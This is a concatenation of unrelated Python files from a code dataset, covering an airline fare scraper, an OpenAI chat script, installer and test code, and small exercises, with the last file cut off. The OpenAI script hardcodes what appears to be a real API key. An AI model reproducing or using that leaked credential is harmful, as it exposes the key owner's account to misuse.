'startDate': '2023-08-20',\n# 'endDate': '2023-08-20',\n# }\n#\n# print(json_data)\n#\n# response = requests.post(\n# 'https://m.csair.com/CSMBP/bookProcess/minPrice/getB2EPriceCalendar',\n# params=params,\n# headers=headers,\n# json=json_data,\n# proxies=PROXIES,\n# )\n#\n# print(response.json())\n\n\ndef get_min_price_a_day(date, dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY):\n \"\"\"\n 查询某一天的最低票价\n :param dep_city: 出发城市代码\n :param arr_city: 到达城市代码\n :param date: 日期\n :return: 最低票价\n \"\"\"\n json_data = {\n 'depCity': dep_city,\n 'arrCity': arr_city,\n 'depCityFlag': True,\n 'arrCityFlag': True,\n 'newGroupBuyId': 'CSAIRXST02',\n 'segType': 'S',\n 
'isInter': 'N',\n        'startDate': date,\n        'endDate': date,\n    }\n\n    response = requests.post(\n        'https://m.csair.com/CSMBP/bookProcess/minPrice/getB2EPriceCalendar',\n        params=params,\n        headers=headers,\n        json=json_data,\n        proxies=PROXIES,\n    )\n    response.raise_for_status()  # 如果响应状态码不是200,主动抛出异常\n    print(response.json())\n    return response.json()['FROMOFLIGHTS'][0]['FLIGHT'][0]['MINPRICE']\n\n\ndef get_min_price_a_day_multi_thread(q, date, dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY):\n    \"\"\"\n    查询某一天的最低票价\n    :param q: 队列\n    :param dep_city: 出发城市代码\n    :param arr_city: 到达城市代码\n    :param date: 日期\n    :return: 最低票价\n    \"\"\"\n    try:\n        q.put((date, get_min_price_a_day(date, dep_city, arr_city)))\n    except Exception as e:\n        print(e)\n\n\ndef get_min_price(dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY, start_date=None, end_date=None):\n    \"\"\"\n    查询某一段时间内的最低票价(非多线程)\n    :param dep_city: 出发城市代码\n    :param arr_city: 到达城市代码\n    :param start_date: 开始日期\n    :param end_date: 结束日期\n    :return: 最低票价\n    \"\"\"\n    if start_date is None:\n        # 如果没有指定开始日期,则默认为7天后\n        start_date = (datetime.now() + timedelta(days=7)).strftime('%Y-%m-%d')\n\n    # 如果没有指定结束日期,则默认为开始日期后14天\n    if end_date is None:\n        end_date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=13)).strftime('%Y-%m-%d')\n\n    # 得出查询日期区间长度\n    date_range = (datetime.strptime(end_date, '%Y-%m-%d') - datetime.strptime(start_date, '%Y-%m-%d')).days + 1\n\n    min_prices = []\n    for i in range(date_range):\n        date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=i)).strftime('%Y-%m-%d')\n        min_prices.append((date, get_min_price_a_day(date, dep_city, arr_city)))\n\n    return min_prices\n\n\ndef get_min_price_multi_thread(dep_city=DEPARTURE_CITY, arr_city=ARRIVAL_CITY, start_date=None, end_date=None):\n    \"\"\"\n    查询某一段时间内的最低票价(多线程)\n    :param dep_city: 出发城市代码\n    :param arr_city: 到达城市代码\n    :param start_date: 开始日期\n    :param end_date: 结束日期\n    :return: 最低票价\n    \"\"\"\n    if start_date is None:\n        # 如果没有指定开始日期,则默认为7天后\n        start_date = (datetime.now() + timedelta(days=7)).strftime('%Y-%m-%d')\n\n    # 如果没有指定结束日期,则默认为开始日期后14天\n    if end_date is None:\n        end_date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=13)).strftime('%Y-%m-%d')\n\n    # 得出查询日期区间长度\n    date_range = (datetime.strptime(end_date, '%Y-%m-%d') - datetime.strptime(start_date, '%Y-%m-%d')).days + 1\n\n    min_prices = []\n    threads = []\n    q = queue.Queue()\n    for i in range(date_range):\n        date = (datetime.strptime(start_date, '%Y-%m-%d') + timedelta(days=i)).strftime('%Y-%m-%d')\n        t = threading.Thread(target=get_min_price_a_day_multi_thread, args=(q, date, dep_city, arr_city))\n        threads.append(t)\n        t.start()\n\n    for t in threads:\n        t.join()\n\n    while not q.empty():\n        min_prices.append(q.get())\n\n    min_prices.sort(key=lambda x: datetime.strptime(x[0], '%Y-%m-%d'))\n    return min_prices\n\n\nif __name__ == '__main__':\n    start_time = time()\n    print(get_min_price_multi_thread(start_date='2023-08-20', end_date='2023-08-28'))\n    print(time() - start_time)\n","repo_name":"sunset-under-forest/Air_tickets","sub_path":"CSAir/api/api2.py","file_name":"api2.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39127952989","text":"import os\nimport openai\n\nopenai.api_key = \"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\"\n\ntxt = \"여우가 게으른 개를 뛰어 넘었다\"\nmode = \"flask\"\n\nchange = {\n    \"낚시\":\"다음 문장을 낚시성 스타일로 바꿔주세요 \",\n    \"영어\" : \"다음 문장을 영어로 번역해 주세요 \",\n    \"flask\" : \"다음 문장을 출력하는 플라스크 코드를 출력해줘\",\n    \"random\" : \"다음 문장을 문자 한글자 별로 순서를 
뒤죽박죽 섞어줘\"\n}\n\nprompt = change[mode] + \"\\n\" + txt\n\nmessages = []\n\nmessages.append({\"role\": \"user\", \"content\": prompt})\ncompletion = openai.ChatCompletion.create(\n    model=\"gpt-3.5-turbo\", messages=messages)\n\nres= completion.choices[0].message['content']\nprint(\"원문 : \" + txt.strip())\nprint(f\"변환({mode}) : \" + res)","repo_name":"agape1225/lectures","sub_path":"python web framework/week11/[11]chatgpt/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22671097896","text":"from opacus.privacy_analysis import compute_rdp, get_privacy_spent\n\n\ndef check_privacy(args):\n\n    orders = [1 + x / 10. for x in range(1, 100)] + list(range(12, 64))\n\n    delta = 1.0 / args.n_client_data\n    sample_rate = args.batch_size / args.n_client_data\n    noise_multiplier = args.noise_multiplier\n\n    steps = args.n_rounds * args.n_epochs / sample_rate\n\n    rdps = compute_rdp(sample_rate, noise_multiplier, steps, orders)\n    epsilon, alpha = get_privacy_spent(orders, rdps, delta)\n\n    return epsilon, alpha\n","repo_name":"layer6ai-labs/ProxyFL","sub_path":"privacy_checker.py","file_name":"privacy_checker.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"48"} +{"seq_id":"4823475130","text":"'''\nCreated on Oct 2, 2012\n\n@author: smirarab\n'''\nimport unittest\nimport sys\n\nfrom sepp.config import options\nfrom sepp import config\nimport os\nimport io\ntry:\n    filetypes = (io.IOBase, file)\nexcept NameError:\n    filetypes = io.IOBase\nfrom sepp.filemgr import get_data_path\nfrom tempfile import mkstemp\nfrom sepp.scheduler import JobPool\nfrom multiprocessing import cpu_count\n\n\nclass Test(unittest.TestCase):\n    fp_config = None\n\n    def setUp(self):\n        _, self.fp_config = mkstemp()\n\n    def tearDown(self):\n        os.remove(self.fp_config)\n\n    def testConfigFile(self):\n        # Just to make different test cases independent of each other.\n        config._options_singelton = None\n        # Disable main config path for this test\n        config.main_config_path = self.fp_config\n\n        sys.argv = [\n            sys.argv[0], \"-A\", \"2\",\n            \"-c\", get_data_path(\"configs/test.config\"),\n            \"--outdir\", \"dir_form_commandline\"]\n\n        assert options().alignment_size == 2, \\\n            \"Commandline option -A not read properly\"\n\n        assert isinstance(options().config_file, filetypes) and \\\n            options().config_file.name.endswith(\"data/configs/test.config\"), \\\n            \"Commandline option -c not read properly\"\n\n        assert (options().pplacer is not None and\n                options().pplacer.path == \"pplacer\"), \\\n            \"config file options not read properly\"\n\n        assert options().placement_size == 10, \\\n            \"Config file option placementSize not read properly\"\n\n        assert options().outdir.endswith(\"dir_form_commandline\"), \\\n            \"Config file value outdir is not properly overwritten:%s \" % \\\n            options().outdir\n\n        assert options().tempdir is not None, \\\n            \"Default value not properly set for tempfile attribute\"\n\n    def testConfigFileMissingFile(self):\n        # Just to make different test cases independent of each other.\n        config._options_singelton = None\n        # Disable main config path for this test\n        config.main_config_path = self.fp_config\n\n        sys.argv = [sys.argv[0],\n                    \"-c\", get_data_path(\"configs/test2.config\"),\n                    \"-f\", get_data_path(\"simulated/test.fas\"),\n                    \"-a\", get_data_path(\"simulated/test.small.fas\")]\n        assert isinstance(options().config_file, 
filetypes) and \\\n options().config_file.name.endswith(\n \"data/configs/test2.config\"), \\\n \"Commandline option -c not read properly\"\n\n assert isinstance(options().alignment_file, filetypes) and\\\n options().alignment_file.name.endswith(\n \"data/simulated/test.small.fas\"), \\\n \"Config file option alignment not read properly\"\n\n assert isinstance(options().fragment_file, filetypes) and\\\n options().fragment_file.name.endswith(\n \"data/simulated/test.fas\"), \\\n \"Command-line option -f alignment not read properly\"\n\n def testMainConfigFile(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n\n sys.argv = [sys.argv[0], \"-c\", get_data_path(\"configs/test2.config\")]\n # set pplacer filepath to a file shipped with the code base\n options().pplacer.path = get_data_path(\n \"../../../tools/bundled/Darwin/pplacer\")\n\n assert (options().pplacer is not None and os.path.exists(\n options().pplacer.path)), \\\n (\"main config file options not read properly,\"\n \"or nonexistent binaries: pplacer = %s\" %\n options().pplacer.path)\n\n options().hmmalign.path = get_data_path(\n \"../../../tools/bundled/Darwin/hmmalign\")\n assert (options().hmmalign is not None and os.path.exists(\n options().hmmalign.path)), \\\n (\"main config file options not read properly, or nonexistent \"\n \"binaries: hmmalign = %s\" % options().hmmalign.path)\n\n options().hmmsearch.path = get_data_path(\n \"../../../tools/bundled/Darwin/hmmsearch\")\n assert (options().hmmsearch is not None and os.path.exists(\n options().hmmsearch.path)), \\\n (\"main config file options not read properly, or nonexistent \"\n \"binaries: hmmsearch = %s\" % options().hmmsearch.path)\n\n def testCpuCount(self):\n # Just to make different test cases independent of each other.\n config._options_singelton = None\n # Disable main config path for this test\n config.main_config_path = self.fp_config\n JobPool().terminate()\n JobPool().__init__(7)\n sys.argv = [sys.argv[0], \"-x\", \"7\"]\n\n assert options().cpu == 7, \"Commandline option -x not read properly\"\n\n # clean up after test:\n # 1) the JobPool CPU counts needs to be reset to the default\n # 2) the command line arguments must be restored\n JobPool().terminate()\n JobPool().__init__(cpu_count())\n sys.argv = [sys.argv[0], \"-x\", str(cpu_count())]\n config._options_singelton = None\n options()\n\n def testLog(self):\n\n import logging\n import sepp.jobs\n\n sdb = sepp._DEBUG\n\n sepp._DEBUG = True\n sepp.reset_loggers()\n sepp.jobs._LOG.debug(\"test debugging works\")\n assert(sepp.jobs._LOG.getEffectiveLevel() == logging.DEBUG)\n\n sepp._DEBUG = False\n sepp.reset_loggers()\n sepp.jobs._LOG.debug(\"test debugging is disabled\")\n assert(sepp.jobs._LOG.getEffectiveLevel() == logging.INFO)\n\n sepp._DEBUG = sdb\n sepp.reset_loggers()\n\n\nif __name__ == \"__main__\":\n # import sys;sys.argv = ['', 'Test.testConfigFile']\n unittest.main()\n","repo_name":"smirarab/sepp","sub_path":"test/unittest/testConfig.py","file_name":"testConfig.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"48"} +{"seq_id":"39062007644","text":"'''\nModule for installing the configured toolchains for the project\n'''\n\nimport os\nimport shutil\nimport subprocess\nimport tarfile\nfrom copy import deepcopy\nfrom dataclasses import dataclass\n\nfrom typing_extensions import Self\n\nfrom project_generator.lib.distromngr import Distribution\nfrom 
project_generator.lib.toolchain import Toolchain\nfrom project_generator.lib.utils.command import CommandBuilder\n\nfrom ._util import (_download_go_toolchain, _download_rust_toolchain,\n                    _install_tools_packages)\n\n\n@dataclass(slots=True)\nclass Installer:\n    '''\n    Class for exposing operations for installing packages\n    '''\n\n    _distribution: Distribution\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        Install the relevant packages based on the toolchain\n        '''\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        Install common accompanying additional tools for each toolchain\n        '''\n\n\n@dataclass(slots=True)\nclass _CToolchainInstaller(Installer):\n    '''\n    C Toolchain installer\n    '''\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        C toolchain installer\n        '''\n\n        pkg_list = Toolchain.C.packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        C additional tools installer\n        '''\n\n        pkg_list = Toolchain.C.extra_packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _CppToolchainInstaller(Installer):\n    '''\n    C++ Toolchain installer\n    '''\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        C++ toolchain installer\n        '''\n\n        pkg_list = Toolchain.CPP.packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        C++ additional tools installer\n        '''\n\n        pkg_list = Toolchain.CPP.extra_packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _GtkToolchainInstaller(Installer):\n    '''\n    Gtk Toolchain installer\n    '''\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        Gtk toolchain installer\n        '''\n\n        pkg_list = Toolchain.GTK.packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        Gtk additional tools installer\n        '''\n\n        pkg_list = Toolchain.GTK.extra_packages_for(self._distribution)\n        return _install_tools_packages(self._distribution, pkg_list)\n\n\n@dataclass(slots=True)\nclass _GoToolchainInstaller(Installer):\n    '''\n    Go Toolchain installer\n    '''\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        Go toolchain installer\n        '''\n\n        go_tar_file = _download_go_toolchain()\n\n        go_root: str = None\n\n        if path is not None and path != \"\":\n            go_root = path\n        else:\n            go_root = os.getenv('GOROOT')\n            if go_root is None or go_root == \"\":\n                go_root = \"/usr/local/sdks/go\"\n\n        extract_path = \"/tmp/golang\"\n\n        tar_handler = tarfile.TarFile.gzopen(go_tar_file, 'r')\n        tar_handler.extractall(extract_path)\n\n        filenames = tar_handler.getnames()\n\n        extracted_path = deepcopy(extract_path)\n\n        common_path = os.path.commonpath(filenames)\n        if common_path.startswith(\".\") is False:\n            extracted_path = os.path.join(extracted_path, common_path)\n\n        shutil.rmtree(go_root, True, None)\n        os.makedirs(os.path.dirname(go_root), exist_ok=True)\n        shutil.move(extracted_path, go_root)\n\n        os.remove(go_tar_file)\n\n        return 0\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        Go additional tools installer\n        '''\n\n        go_tools_list = [\n            'github.com/cweill/gotests/gotests@latest',\n            'github.com/fatih/gomodifytags@latest',\n            
'github.com/josharian/impl@latest',\n            'github.com/haya14busa/goplay/cmd/goplay@latest',\n            'github.com/go-delve/delve/cmd/dlv@latest',\n            'honnef.co/go/tools/cmd/staticcheck@latest',\n            'golang.org/x/tools/gopls@latest',\n            'github.com/ramya-rao-a/go-outline@latest'\n        ]\n\n        for tool in go_tools_list:\n            cmd = CommandBuilder() \\\n                .program('go') \\\n                .arg('install') \\\n                .arg(tool) \\\n                .build()\n\n            ret = cmd.run()\n            if ret != 0:\n                raise subprocess.CalledProcessError(\n                    ret, ' '.join(cmd.flatten()))\n\n        return 0\n\n\n@dataclass(slots=True)\nclass _RustToolchainInstaller(Installer):\n    '''\n    Rust Toolchain installer\n    '''\n\n    def install_toolchain(self, path: str = None) -> int:\n        '''\n        Rust toolchain installer\n        '''\n\n        rustup_init_bin = _download_rust_toolchain()\n\n        os.chmod(rustup_init_bin, 0o755)\n\n        cmd = CommandBuilder().program(rustup_init_bin).option(\"-y\").build()\n        ret = cmd.run()\n        if ret != 0:\n            raise subprocess.CalledProcessError(ret, ' '.join(cmd.flatten()))\n\n        os.remove(rustup_init_bin)\n\n        return ret\n\n    def install_additional_tools(self, path: str = None) -> int:\n        '''\n        Rust additional tools installer\n        '''\n\n        cmd = CommandBuilder() \\\n            .program('rustup') \\\n            .arg('component') \\\n            .arg('add') \\\n            .arg('rust-analyzer') \\\n            .build()\n\n        ret = cmd.run()\n        if ret != 0:\n            raise subprocess.CalledProcessError(ret, ' '.join(cmd.flatten()))\n\n        return ret\n\n\n@dataclass(slots=True)\nclass ToolchainInstaller:\n    '''\n    Installs a given toolchain for the specified distro\n    '''\n\n    distribution: Distribution\n    toolchain: Toolchain\n    install_path: str = \"\"\n    additional_tools: bool = False\n\n    def run(self) -> int:\n        '''\n        Run the constructed installer\n        '''\n\n        if self.toolchain is None or self.toolchain not in Toolchain:\n            raise ValueError(\n                f\"Invalid or unsupported toolchain '{self.toolchain}' specified\")\n\n        if self.toolchain not in [Toolchain.GO, Toolchain.RUST] and \\\n                (self.distribution is None or self.distribution not in Distribution):\n            raise ValueError(\n                f\"Distribution not specified for '{self.toolchain.value}' toolchain\")\n\n        installer = None\n        if self.toolchain == Toolchain.C:\n            installer = _CToolchainInstaller(self.distribution)\n        elif self.toolchain == Toolchain.CPP:\n            installer = _CppToolchainInstaller(self.distribution)\n        elif self.toolchain == Toolchain.GTK:\n            installer = _GtkToolchainInstaller(self.distribution)\n        elif self.toolchain == Toolchain.GO:\n            installer = _GoToolchainInstaller(self.distribution)\n        elif self.toolchain == Toolchain.RUST:\n            installer = _RustToolchainInstaller(self.distribution)\n\n        ret = installer.install_toolchain()\n        if ret != 0:\n            return ret\n\n        if self.additional_tools:\n            ret = installer.install_additional_tools()\n\n        return ret\n\n\n@dataclass(slots=True)\nclass ToolchainInstallerBuilder:\n    '''\n    Get the installer based on inputs\n    '''\n    _toolchain_installer: ToolchainInstaller\n\n    def __init__(self):\n        self._toolchain_installer = ToolchainInstaller(None, None)\n\n    def install_toolchain(self, toolchain: Toolchain, path: str = \"\") -> Self:\n        '''\n        Specify the toolchain to be installed\n        '''\n\n        self._toolchain_installer.toolchain = toolchain\n        self._toolchain_installer.install_path = path\n        return self\n\n    def install_additional_tools(self, install: bool = False) -> Self:\n        '''\n        Specify whether to install additional utility tools accompanied with\n        the toolchain\n        '''\n\n        self._toolchain_installer.additional_tools = install\n        return self\n\n    def distribution(self, distribution: Distribution) -> Self:\n        '''\n        Specify the 
distribution\n        '''\n\n        self._toolchain_installer.distribution = distribution\n        return self\n\n    def build(self) -> ToolchainInstaller:\n        '''\n        Return the constructed installer\n        '''\n\n        return self._toolchain_installer\n","repo_name":"nnishant776/project_generator","sub_path":"src/project_generator/lib/toolchain_manager/installer/_installer.py","file_name":"_installer.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18176191284","text":"#!/usr/bin/python3\n#\n# date: 12.26.2017\n# by: keith crowder\n# name: magicians.v3.py\n#\n# exercise 8-11, used solution\n# https://ehmatthes.github.io/pcc/solutions/chapter_8.html#8-10-great-magicians\n#\ndef show_magicians(magicians):\n    for magician in magicians:\n        print(magician.title())\n\ndef make_great(magicians):\n#\n    great_magicians = []\n#\n    while magicians:\n        magician = magicians.pop()\n        great_magician = magician + \" the Great!\"\n        great_magicians.append(great_magician)\n#\n    for great_magician in great_magicians:\n        magicians.append(great_magician)\n\n    return magicians\n#\nmagicians = ['bob', 'bill','brenda']\nshow_magicians(magicians)\n#\nprint(\"\\nGreat magicians:\")\ngreat_magicians = make_great(magicians[:])\nshow_magicians(great_magicians)\n#\nprint(\"\\nOriginal magicians:\")\nshow_magicians(magicians)\n#\n# end of program\n#\n","repo_name":"kcrowder/python","sub_path":"magicians.v3.py","file_name":"magicians.v3.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20274918521","text":"#!/usr/bin/python3\n\"\"\"Defines a class named \"Square\" that represents a square.\nThe class inherits from the \"Rectangle\" class, which means\nit inherits the attributes and methods of the Rectangle\nclass and adds its own specific functionality for squares.\n\nThe constructor (__init__) initializes a new Square object with\nthe provided size, x-coordinate, y-coordinate, and id. It\ncalls the parent class's constructor (super()).\nThis ensures that the Square is initialized as a special case\nof a Rectangle with equal width and height.\n\nThe size property provides a getter and setter for the size\nattribute of the square. It maps the size attribute to\nthe width attribute of the underlying Rectangle.\n\nThe update method allows updating the attributes of the\nsquare using either positional arguments or keyword arguments.\nIt checks if positional arguments (args) or keyword arguments (kwargs)\nare provided and updates the corresponding attributes accordingly.\n\nThe to_dictionary method returns a dictionary representation of\nthe square, containing its attributes (id, size, x, and y). It leverages\nthe parent class's width attribute to represent the size.\n\nThe __str__ method provides a string representation of the square\nthat can be used with the print function or str function. 
It\ndisplays the square's id, x and y coordinates, and size\n(which is mapped to the width attribute).\n\n\"\"\"\n\n\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n    \"\"\"Represent a square.\"\"\"\n\n    def __init__(self, size, x=0, y=0, id=None):\n        \"\"\"Initialize a new Square.\n\n        Args:\n            size (int): The size of the new Square.\n            x (int): The x coordinate of the new Square.\n            y (int): The y coordinate of the new Square.\n            id (int): The identity of the new Square.\n        \"\"\"\n        super().__init__(size, size, x, y, id)\n\n    @property\n    def size(self):\n        \"\"\"Get/set the size of the Square.\"\"\"\n        return self.width\n\n    @size.setter\n    def size(self, value):\n        self.width = value\n        self.height = value\n\n    def update(self, *args, **kwargs):\n        \"\"\"Update the Square.\n\n        Args:\n            *args (ints): New attribute values.\n                - 1st argument represents id attribute\n                - 2nd argument represents size attribute\n                - 3rd argument represents x attribute\n                - 4th argument represents y attribute\n            **kwargs (dict): New key/value pairs of attributes.\n        \"\"\"\n        if args and len(args) != 0:\n            a = 0\n            for arg in args:\n                if a == 0:\n                    if arg is None:\n                        self.__init__(self.size, self.x, self.y)\n                    else:\n                        self.id = arg\n                elif a == 1:\n                    self.size = arg\n                elif a == 2:\n                    self.x = arg\n                elif a == 3:\n                    self.y = arg\n                a += 1\n\n        elif kwargs and len(kwargs) != 0:\n            for k, v in kwargs.items():\n                if k == \"id\":\n                    if v is None:\n                        self.__init__(self.size, self.x, self.y)\n                    else:\n                        self.id = v\n                elif k == \"size\":\n                    self.size = v\n                elif k == \"x\":\n                    self.x = v\n                elif k == \"y\":\n                    self.y = v\n\n    def to_dictionary(self):\n        \"\"\"Return the dictionary representation of the Square.\"\"\"\n        return {\n            \"id\": self.id,\n            \"size\": self.width,\n            \"x\": self.x,\n            \"y\": self.y\n        }\n\n    def __str__(self):\n        \"\"\"Return the print() and str() representation of a Square.\"\"\"\n        return \"[Square] ({}) {}/{} - {}\".format(self.id, self.x, self.y,\n                                                 self.width)\n","repo_name":"AmazedWonder/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69968137426","text":"import os\nimport numpy as np\nimport pandas as pd\n\nimport torch\nfrom data_utils import *\nfrom infer_utils import *\nfrom one_shot_model import *\n\n\nclass DummyArgs:\n    embed_dim = 200\n    hidden_dim = 256\n    hidden_layers = 3\n\n\ndef run():\n    data_formatter = DataFormatter()\n    train, test = data_formatter.get_data()\n    print('Train distribution')\n    print(pd.Series([i[0] for i in train]).value_counts())\n    print('Test distribution')\n    print(pd.Series([i[0] for i in test]).value_counts())\n\n    args = DummyArgs()\n\n    model_path = '/data/users/kyle.shaffer/wm/oneshot_models/stacked_one_shot_model.pt'\n    model = SiameseNet(vocab_size=data_formatter.vocab_size, args=args)\n    model.load_state_dict(torch.load(model_path))\n    print('Model loaded...')\n\n    predictor = OneshotPredictor(model=model, train_set=train, test_set=test[:10000])\n    print( predictor.comparison_labels)\n    predictor.run_eval()\n\n\nif __name__ == '__main__':\n    os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n    run()","repo_name":"kylejshaffer/few_shot_text","sub_path":"src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"71431715666","text":"from hundir import 
func_random\r\nfrom hundir import jugador1\r\nfrom hundir import jugador2\r\nfrom hundir import coloca_jugador1\r\nfrom hundir import coloca_maquina\r\n\r\n##'¡El juego empieza aqui!'!##\r\nprint(\"¡Que empiece el juego!\")\r\nprint()\r\nimport time\r\nturno = 1\r\n\r\nfunc_random(input(\"Nombre 1:\"),\"Maquina\")\r\nprint()\r\nprint(\"Coloca jugador 1\"\"\\n\")\r\ncoloca_jugador1()\r\nprint()\r\nprint(\"Coloca jugador 2\"\"\\n\")\r\ncoloca_maquina()\r\n\r\n\r\nwhile \"#\" in jugador1.tablero1.values or \"#\" in jugador2.tablero2.values:\r\n\r\n    print(\"Turno:\", turno)\r\n    time.sleep(1)\r\n    print(\"Ataca el jugador 1\")\r\n    jugador1.atacar(jugador2)\r\n    print(\"Ataca el jugador 2\")\r\n    jugador2.atacar(jugador1)\r\n    turno = turno + 1\r\n    print(\"---------\")\r\n\r\nelse:\r\n    if \"#\" in jugador1.tablero1.values:\r\n        print(\"¡Gana el jugador 1!\")\r\n    elif \"#\" in jugador2.tablero2.values:\r\n        print(\"¡Gana el jugador 2!\")\r\n    else:\r\n        print(\"GAME OVER, caputto\")\r\n","repo_name":"Beceiro21/Hundir-la-flota","sub_path":"batalla_naval.py","file_name":"batalla_naval.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40754321611","text":"class Solution(object):\n    def getLongestPath2(self, filesys):\n        list = filesys.splitlines()  # Parse the string into list\n        st = [0]  # to add the path separator before root dir\n        lastLevel = -1  # depth of the last item in st\n        sum = 0\n        for item in list:\n            print(item)\n            bareName = item.lstrip(' ')  # Strip leading spaces\n            curLevel = len(item) - len(bareName)  # Use number of leading spaces to find level\n            while (curLevel <= lastLevel):  # cd .. to the same level as \"item\"\n                st.pop()\n                lastLevel -= 1\n            st.append(len(bareName) + st[-1] + 1)  # accumulated length, +1 for path-sep\n            lastLevel = curLevel\n            if ('.' 
in item):  # Only count \"files\" with an extension\n                sum += st[-1]\n            print(\"#\", st, curLevel, sum)\n        return sum\n\n    def getLongestPath(self, S):\n        list = S.splitlines()\n        seperator_array = [0]\n        last_level = -1\n        maximum_length = 0\n        for item in list:\n            print(item)\n            fs_name = item.lstrip(' ')\n            current_level = len(item) - len(fs_name)\n            while current_level <= last_level:\n                seperator_array.pop()\n                last_level -= 1\n            seperator_array.append(len(fs_name) + seperator_array[-1] + 1)\n            last_level = current_level\n            if '.jpeg' in item or '.png' in item or '.gif' in item:\n                maximum_length = max(maximum_length, seperator_array[-2])\n            print(\"#\", seperator_array, current_level, maximum_length)\n        return maximum_length\n\nmySol = Solution()\nprint(mySol.getLongestPath(\"d1\\n d2\\n  d4\\nd3\\n t.png\\nd3\\n t.png\"))","repo_name":"udaykd09/Algorithms","sub_path":"FileSystem.py","file_name":"FileSystem.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14624654160","text":"# list of possible charts in the format:\n# {python function name} : {js class}, {js package}\nCHARTS_TYPES = {\n    'geochart' : ('GeoChart', 'geochart'),\n    'linechart' : ('LineChart', 'corechart')\n}\n\nclass ChartFunctionGenerator(object):\n    '''Generator of the functions that are used to draw\n    charts of different types.'''\n    \n    def __init__(self, wrapped_module):\n        self.wrapped_module = wrapped_module\n    \n    def __getattr__(self, name):\n        charts = self.wrapped_module.charts\n        if name in CHARTS_TYPES:\n            class_name, package = CHARTS_TYPES[name]\n            return charts.generate_chart_function(class_name, [package])\n        else:\n            raise AttributeError(name)","repo_name":"floreskul/pygchart","sub_path":"function_generator.py","file_name":"function_generator.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13011103537","text":"#! 
/usr/bin/env python3\nimport sys\nimport logging\nimport os.path\nimport hashlib\nimport argparse\n\nimport requests\nimport dhtmlparser\nfrom ebooklib import epub\n\nPROJECT_URL = \"https://github.com/Bystroushaak/meaningness.com_epub_generator\"\n\n\nlogger = logging.getLogger(\"convertor\")\nstderr_logger = logging.StreamHandler(sys.stderr)\nstderr_logger.setFormatter(logging.Formatter(\n    \"%(asctime)s %(levelname)s: %(message)s\"\n))\nlogger.addHandler(stderr_logger)\nlogger.setLevel(logging.DEBUG)\n\n\nclass BookGenerator:\n    \"\"\"\n    Just to keep track of chapters, automatically generate table of contents\n    and so on.\n    \"\"\"\n    def __init__(self, title):\n        self.book = epub.EpubBook()\n        self.title = title\n        self.chapters = []\n        self.toc = []\n\n        self.book.set_title(self.title)\n\n    def generate_ebook(self, path):\n        self._add_css()\n        self._add_toc()\n\n        epub.write_epub(path, self.book, {})\n\n    def set_language(self, lang):\n        return self.book.set_language(lang)\n\n    def add_metadata(self, namespace, name, value, others=None):\n        return self.book.add_metadata(namespace, name, value, others)\n\n    def add_chapter(self, chapter):\n        self.book.add_item(chapter)\n        self.chapters.append(chapter)\n\n    def add_image(self, image):\n        self.book.add_item(image)\n\n    def add_author(self, author):\n        self.book.add_author(author)\n\n    def _add_toc(self):\n        if self.toc:\n            self.book.toc = self.toc\n        else:\n            self.book.toc = (\n                (epub.Section(self.title),\n                 self.chapters),\n            )\n\n        self.book.add_item(epub.EpubNcx())\n        self.book.add_item(epub.EpubNav())\n\n        self.book.spine = ['nav'] + self.chapters\n\n    def _add_css(self):\n        # define CSS style\n        style = 'BODY {color: white;}'\n        nav_css = epub.EpubItem(\n            uid=\"style_nav\",\n            file_name=\"style/nav.css\",\n            